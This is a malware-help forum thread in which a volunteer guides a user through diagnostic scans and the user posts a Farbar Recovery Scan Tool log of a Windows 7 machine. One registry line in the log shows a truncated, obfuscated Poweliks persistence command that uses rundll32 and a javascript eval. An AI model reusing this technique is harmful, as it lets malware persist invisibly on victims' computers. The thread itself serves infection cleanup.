When I discovered my computer acting slow I went to processes to find dllhost.exe duplicating itself to about the quantity of 30, taking up large amounts CPU. I ran Norton, and NPE and it did not detect the virus, and I would get a windows message "powershell failure". I would be pleased to be helped in my current situation.
WE'RE SURE THAT YOU'LL LOVE US!
Hey there! 
Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. 
Join 93084 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.
Try What the Tech -- It's free!
dllhost.exe duplicating and powershell failure
Started by
Conor Detwiller
, Nov 06 2014 07:03 PM
11 replies to this topic
Register to Remove
#2
Conspire
-
- Retired Classroom Teacher
-
- 5,806 posts
SuperHelper
Posted 07 November 2014 - 09:35 AM
**In any case where you happen to be busy or unable to give us a reply, we would be grateful if you keep us informed in advance and we will be more than happy to wait. Failure to do so we will have your thread closed in THREE(3) days.
Hello there, Conor
I'm Conspire, I'll be glad to help you with your computer problems.
Please observe these rules while we work:
- Read the entire procedure
- It is important to perform ALL actions in sequence.
- If you don't know, stop and ask! Don't keep going on.
- Please reply to this thread. Do not start a new topic.
- Stick with me till you're given the all clear.
- Remember, absence of symptoms does not mean the infection is all gone.
- Don't attempt to clean your computer with any tools other than the ones I ask you to use during the cleanup process.
IMPORTANT NOTE : Please do not delete anything unless instructed to. Remember to backup all your important data(if possible) before moving on.
---------------------------------------------------------------------------------------------------
Please download Farbar Recovery Scan Tool and save it to your Desktop.
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.
- Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
- When the tool opens, click Yes to disclaimer.
- Press the Scan button.
- When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
- Please copy and paste the log in your next reply.
Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.
===================================================
Please download aswMBR.exe and save it to your desktop.
- Double click aswMBR.exe to start the tool. (Vista/Windows 7 users - right click to run as administrator)
- Allow it to update where necessary
- Click Scan
- Upon completion of the scan, click Save log and save it to your desktop, and post that log in your next reply for review. Note - do NOT attempt any Fix yet.
- You will also notice another file created on the desktop named MBR.dat. Right click that file and select Send To>Compressed (zipped) file. Attach that zipped file in your next reply as well.
===================================================
On your next reply please post :
FRST log
aswMBR log
MBR.dat (attached)
Please STOP and let me know if you have any problems in performing with the steps above or any questions you may have.
Proud Graduate of the WTT Classroom
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
Member of UNITE
The help you receive here is always free. If you wish to show your appreciation, then you may
#3
Conor Detwiller
-
- Authentic Member
-
- 6 posts
New Member
Posted 07 November 2014 - 03:03 PM
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014
Ran by MoM (administrator) on MOM-HP on 07-11-2014 15:57:19
Running from C:\Users\MoM\Desktop
Loaded Profile: MoM (Available profiles: MoM)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
(Portrait Displays, Inc.) C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DTSRVC.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
() C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
() C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperAgent.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(Portrait Displays, Inc.) C:\Program Files (x86)\Common Files\Portrait Displays\Drivers\pdisrvc.exe
(Roxio) C:\Program Files (x86)\Roxio\RoxioNow Player\RNowSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard ) C:\Program Files\IDT\WDM\beats64.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Deskjet 3510 series\Bin\ScanToPCActivationApp.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Curse, Inc) C:\Users\MoM\AppData\Roaming\Curse Client\Bin\Curse.exe
(Microsoft Corporation) C:\Windows\SysWOW64\schtasks.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\Media\Webcam\YCMMirage.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Deskjet 3510 series\Bin\HPNetworkCommunicatorCom.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Deskjet 3510 series\Bin\HPNetworkCommunicator.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\HPTouchSmartSyncCalReminderApp.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [BeatsOSDApp] => C:\Program Files\IDT\WDM\beats64.exe [37888 2010-10-21] (Hewlett-Packard )
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1128448 2011-06-24] (IDT, Inc.)
HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM-x32\...\Run: [StartCCC] => c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [336384 2011-06-30] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [DT HPO] => C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DT_startup.exe [121648 2011-08-19] (Portrait Displays, Inc.)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [658424 2011-05-05] (PDF Complete Inc)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-10-11] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\qttask.exe [421888 2012-11-19] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SMessaging] => "C:\Users\MoM\AppData\Local\Strongvault Online Backup\SMessaging.exe"
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)
HKLM\...\Policies\Explorer: [AllowLegacyWebView] 1
HKLM\...\Policies\Explorer: [AllowUnhashedWebView] 1
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [HP Deskjet 3510 series (NET)] => C:\Program Files\hp\HP Deskjet 3510 series\Bin\ScanToPCActivationApp.exe [2552168 2012-05-08] (Hewlett-Packard Co.)
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [22869088 2014-10-21] (Google)
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [BackupAgent] => C:\Program Files (x86)\Strongvault Online Backup\BackupAgent.exe
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [Facebook Update] => C:\Users\MoM\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-05-10] (Facebook Inc.)
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-09-23] (Google Inc.)
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\Overwolf.exe -silent
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [22066272 2014-10-01] (Skype Technologies S.A.)
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\MountPoints2: {47658f94-5cda-11e2-b468-4c72b92efff8} - G:\MotorolaDeviceManagerSetup.exe -a
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...\MountPoints2: {7f12c475-058d-11e2-b461-4c72b92efff8} - G:\setup.exe -a
HKU\S-1-5-21-4081318669-4177893195-338242575-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\MoM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk
ShortcutTarget: Curse.lnk -> C:\Users\MoM\AppData\Roaming\Curse Client\Bin\Curse.exe (Curse, Inc)
Startup: C:\Users\MoM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - .lnk
ShortcutTarget: Monitor Ink Alerts - .lnk -> C:\Program Files\hp\HP Deskjet 3510 series\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
Startup: C:\Users\MoM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Deskjet 3510 series (Network).lnk
ShortcutTarget: Monitor Ink Alerts - HP Deskjet 3510 series (Network).lnk -> C:\Program Files\hp\HP Deskjet 3510 series\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.c...client&ie=UTF-8
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPDSK/1
SearchScopes: HKLM - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.co...&l=dis&o=HPDTDF
SearchScopes: HKLM - {9C2040EB-1D7A-452C-AE06-21B3CCCA9794} URL = http://www.amazon.co...ds={searchTerms}
SearchScopes: HKLM - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPDTDF
SearchScopes: HKLM - {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = http://en.wikipedia....ch={searchTerms}
SearchScopes: HKLM-x32 - DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = http://feed.helperba...&q={searchTerms}
SearchScopes: HKLM-x32 - {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = http://feed.helperba...&q={searchTerms}
SearchScopes: HKCU - 00D0686072044826B4B861174FBD522F URL = http://feed.helperba...&q={searchTerms}
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - No Name - {ae07101b-46d4-4a98-af68-0333ea26e113} - No File
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - No Name - {ae07101b-46d4-4a98-af68-0333ea26e113} - No File
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.appl...ex/qtplugin.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/VirtualEarth3D,version=4.0 -> c:\Program Files (x86)\Virtual Earth 3D\ ()
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/VirtualEarth3D,version=4.0 -> c:\Program Files (x86)\Virtual Earth 3D\ ()
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll (Nexon)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\MoM\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF Plugin HKCU: intel.com/AppUpx64 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll No File
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: HP Smart Print - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2013-04-02]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\IPSFF [2014-10-27]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn [2014-11-07]
Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Newhub) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\aoejbmmillcdifgagjpdlaamnalbielp [2014-03-18]
CHR Extension: (Google Drive) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-05]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-22]
CHR Extension: (AdBlock) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-10-23]
CHR Extension: (Norton Identity Safe) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-12]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2014-11-04]
CHR Extension: (Norton Security Toolbar) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2014-06-20]
CHR Extension: (Google Wallet) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-04]
CHR Extension: (The World of Amazon) - C:\Users\MoM\AppData\Local\Google\Chrome\User Data\Default\Extensions\paoffajmgbcahadajcmpbdabpkapckkj [2014-10-23]
CHR HKLM\...\Chrome\Extension: [aoejbmmillcdifgagjpdlaamnalbielp] - C:\Users\MoM\AppData\Local\nwhb-v9.4.15.crx [2014-03-18]
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-27]
CHR HKCU\...\Chrome\Extension: [aoejbmmillcdifgagjpdlaamnalbielp] - C:\Users\MoM\AppData\Local\nwhb-v9.4.15.crx [2014-03-18]
CHR HKCU\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MoM\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [2013-05-03]
CHR HKLM-x32\...\Chrome\Extension: [aoejbmmillcdifgagjpdlaamnalbielp] - C:\Users\MoM\AppData\Local\nwhb-v9.4.15.crx [2014-03-18]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-27]
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 DTSRVC; C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe [129840 2011-08-19] (Portrait Displays, Inc.)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 MotoHelper; C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperService.exe [226624 2011-01-27] ()
R2 N360; C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1128952 2011-05-05] (PDF Complete Inc)
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R1 BHDrvx64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141030.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2014-02-20] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-08-26] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-08-26] (Symantec Corporation)
S3 FintekCIR; C:\Windows\system32\drivers\FintekCIR.sys [30248 2009-11-13] (Fintek)
R1 IDSVia64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141105.001\IDSvia64.sys [633560 2014-10-27] (Symantec Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141106.004\ENG64.SYS [129752 2014-08-11] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141106.004\EX64.SYS [2137304 2014-08-11] (Symantec Corporation)
R3 NWVoltron; C:\Windows\system32\drivers\NWVoltron.sys [28440 2011-06-23] ()
S3 NWWakeFilterV; C:\Windows\system32\drivers\NWWakeFilterV.sys [16152 2011-06-23] (n/a)
R1 SRTSP; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2014-08-25] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-10-27] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\system32\drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-11-07 15:57 - 2014-11-07 15:59 - 00024741 _____ () C:\Users\MoM\Desktop\FRST.txt
